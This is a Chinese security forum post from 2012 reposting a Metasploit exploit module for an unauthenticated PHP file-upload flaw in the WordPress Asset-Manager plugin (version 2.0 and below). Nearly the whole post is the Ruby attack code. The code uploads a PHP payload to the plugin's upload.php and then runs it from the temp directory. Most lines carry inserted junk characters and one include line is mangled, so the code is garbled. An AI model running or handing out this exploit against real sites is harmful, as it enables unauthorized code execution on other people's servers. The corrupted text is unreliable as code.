找回密码
 立即注册
中国网络渗透测试联盟»论坛 --==渗透测试区{ Penetration testing area }==-- web app渗透测试::『Web App penetration testing』 WordPress Asset-Manager PHP文件上传漏洞
欢迎中测联盟老会员回家,1997年注册的域名
返回列表 发新帖
查看: 1887|回复: 0
打印 上一主题 下一主题

WordPress Asset-Manager PHP文件上传漏洞

[复制链接]
admin
跳转到指定楼层
楼主
发表于 2012-12-31 09:22:33 | 显示全部楼层 回帖奖励 |倒序浏览 |阅读模式
这个模块利用Metasploi脆弱漏洞库在WordPress版本Asset-Manager插件2.0以及以下版本发现的。允许上传php文件、一用户可以上传一个文件到一个临时目录没有身份验证,从而导致执行任意代码。  X: v' N3 n6 F$ A
' ]/ ?, T. ?& H; x- A2 ~1 {
##3 k5 K% ]8 |4 n; g
# This file is part of the Metasploit Framework and may be subject to
7 G( b% f* a1 v0 X# redistribution and commercial restrictions. Please see the Metasploit
# |0 O" _' o5 o. k# Framework web site for more information on licensing and terms of use.
% @9 Z/ \  n9 d2 `#   http://metasploit.com/framework// {; e; V% E1 B2 j2 {" |
##
" v' @, P. F9 C1 P' E
+ Z- x7 l0 \, Q8 x2 U7 A5 rrequire 'msf/core'( o1 q0 R: {5 S, E( V( X
require 'msf/core/exploit/php_exe'
5 f8 J, @6 E7 K" ]6 ?& e
$ G0 l: {4 z7 n6 z& @1 [# zclass Metasploit3 < Msf::Exploit::Remote
5 \( ]6 z% T6 J0 z% _; D, z9 @  i  Rank = ExcellentRanking! T) ~& P. A! _: e7 K+ P5 {- O' K

% u5 e3 n2 T- u2 t( i8 d% V  include Msf::Exploit::Remote::HttpClient( j. r1 D/ E0 V' n
  include Msf::Exploit:hpEXE
) W" T) ~7 U9 @8 |5 x
3 z+ \; O6 B( x0 ]6 H2 m  def initialize(info = {})
$ m' o7 e( q# ~    super(update_info(info,( h8 b) A- w( V0 D$ H# w% R
      'Name'           => 'WordPress Asset-Manager PHP File Upload Vulnerability',; X+ d: x0 A" P1 l
      'Description'    => %q{
+ v  Z4 F4 l. v9 r) [! c9 j! V        This module exploits a vulnerability found in Asset-Manager <= 2.0  WordPress: }  V2 o; `5 k! X, f
        plugin.  By abusing the upload.php file, a malicious user can upload a file to a4 l/ y0 ]$ v1 J; O6 S
        temp directory without authentication, which results in arbitrary code execution.
: T% a% c$ o+ k) W6 S      },- Q9 U0 S( \% E7 p8 y, A
      'Author'         =>8 `% w- W' O* `( Z; O  G+ b* H, G
        [9 ~1 j2 [7 j, U
          'Sammy FORGIT', # initial discovery4 Q. m  O1 W2 l4 _
          'James Fitts <fitts.james[at]gmail.com>' # metasploit module
. L* x- R5 [* N1 ^2 [: R2 ]        ],$ H% A5 |7 L! z1 U3 S' I
      'License'        => MSF_LICENSE,; Z; {4 ]& ?0 E7 R: w. M; n
      'References'     =>
: y3 _# ^+ ^: u2 o        [9 v% O: Y5 [* ^$ n$ v% U
          [ 'OSVDB', '82653' ],. h3 ], N6 i) U) h" p; F% s
          [ 'BID', '53809' ],4 j7 ^: p. ]3 {) ~/ v
          [ 'EDB', '18993' ],
4 ~. }3 Y1 }* s          [ 'URL', 'http:// www.myhack58.com /' ]3 I* }* C7 |+ q$ ]; V
        ],
$ J# y0 G7 |( y3 w5 l      'Payload'       =>
+ ^0 y. U- L' M! q- S* B; n; k        {
( n1 o& u0 i" o# c% N# e9 d          'BadChars' => "\x00",7 Z$ q: S/ d& ^$ G8 j3 Z
        },1 F0 Z2 T- V. [* ^  l2 J
      'Platform'       => 'php',  _& m! L5 F' I2 k: w8 c
      'Arch'           => ARCH_PHP,2 Y, N4 `* L- j1 d, C0 O: N/ O
      'Targets'        =>9 e' h# S- G0 K% m9 }% K
        [3 Y, y7 t; V. z' @* x& J& c0 s8 \
          [ 'Generic (PHP Payload)', { 'Arch' => ARCH_PHP, 'Platform' => 'php' } ],
% z0 w; v- j1 M          [ 'Linux x86', { 'Arch' => ARCH_X86, 'Platform' => 'linux' } ]
; j2 }. B& b" R' X+ l        ],5 X+ O3 a, S& v1 X
      'DefaultTarget' => 0,- h/ N1 {' ~9 K, j* F
      'DisclosureDate' => 'May 26 2012'))
& Z8 C9 b: r# `+ \' n; i9 q' h
; R! b5 r3 N; ]( z/ {; k    register_options(
9 d3 r- k, u+ b  K* H      [
0 a3 F3 D' U) d  I6 H7 K        OptString.new('TARGETURI', [true, 'The full URI path to WordPress', '/wordpress'])
' `' u% r! F+ ~! O0 N      ], self.class)# q+ w# v# F4 P1 f2 A3 C8 S1 F
  end- \% a3 ]. s7 }, J& ~$ j5 G" _; e
# K3 T+ {* N( E! B2 V: J6 T* q0 z
  def exploit
- }' e7 d4 G4 `3 r- \' h1 K7 a' y    uri =  target_uri.path8 W; e1 m/ r' f, ?+ D
    uri << '/' if uri[-1,1] != '/'
# F0 g# u; a# Y  a    peer = "#{rhost}:#{rport}"9 T1 U) g* S, v; f) k1 |4 w1 v
    payload_name = "#{rand_text_alpha(5)}.php"
7 V" q9 x6 v! V    php_payload = get_write_exec_payload(:unlink_self=>true)
0 ^: E3 @2 `( N5 y+ e% A / Z; N5 v% \4 Z: Z  h& J) M
    data = Rex::MIME::Message.new. I7 Q* L2 K# t) |! M; q; z* e4 N6 e
    data.add_part(php_payload, "application/octet-stream", nil, "form-data; name=\"Filedata\"; filename=\"#{payload_name}\"")
+ P) \6 D( y1 U    post_data = data.to_s.gsub(/^\r\n\-\-\_Part\_/, '--_Part_')2 B/ ^7 ~% u# W: z) e1 U
5 n8 R5 l, B+ a2 j
    print_status("#{peer} - Uploading payload #{payload_name}")
( J) r. f1 p0 N% V$ y7 f9 P    res = send_request_cgi({
& a( F0 a4 V  C% A      'method'  => 'POST',( g: z& u. {/ S
      'uri'     => "#{uri}wp-content/plugins/asset-manager/upload.php",& Z+ m. w; R2 }
      'ctype'   => "multipart/form-data; boundary=#{data.bound}",
3 J" E$ a+ T7 b9 ^* n" h      'data'    => post_data
& Q: Z! w5 Y9 C7 \1 X7 \    })/ [' C& v( `" A

" x; F8 ^; i6 \    if not res or res.code != 200 or res.body !~ /#{payload_name}/: r- Y; [, N! F
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Upload failed")
$ v; \! u0 u* y/ Vend0 Z# C! Z% e' o; @* `) b

8 L. x4 Q* o9 _1 R6 F+ m    print_status("#{peer} - Executing payload #{payload_name}")
+ F9 y  l! `4 X6 H1 _" [    res = send_request_raw({% |' H1 [6 R( }& U# [9 \
      'uri'     => "#{uri}wp-content/uploads/assets/temp/#{payload_name}",
4 P  x3 g/ K4 O; }      'method'  => 'GET'3 k, m3 ]9 |, ]
    })) P8 n9 F8 O: Z& T

2 }( [/ k, V! \$ n    if res and res.code != 200& x# B; R" f$ d- L0 a
      fail_with(Exploit::Failure::UnexpectedReply, "#{peer} - Execution failed")
# |& H5 G$ L& b7 `! Z- w9 E2 `$ P    end
/ g( Z, ]+ Q- ?! e  end
$ B' g  R: J0 w& Nend
2 [$ y! z6 X& _, Y. l3 v: ^  U
回复

使用道具 举报

返回列表 发新帖
高级模式
B Color Image Link Quote Code Smilies
您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

Copyright © 2001-2013 Comsenz. All Rights Reserved - Powered by Discuz! X3.2
快速回复 返回顶部 返回列表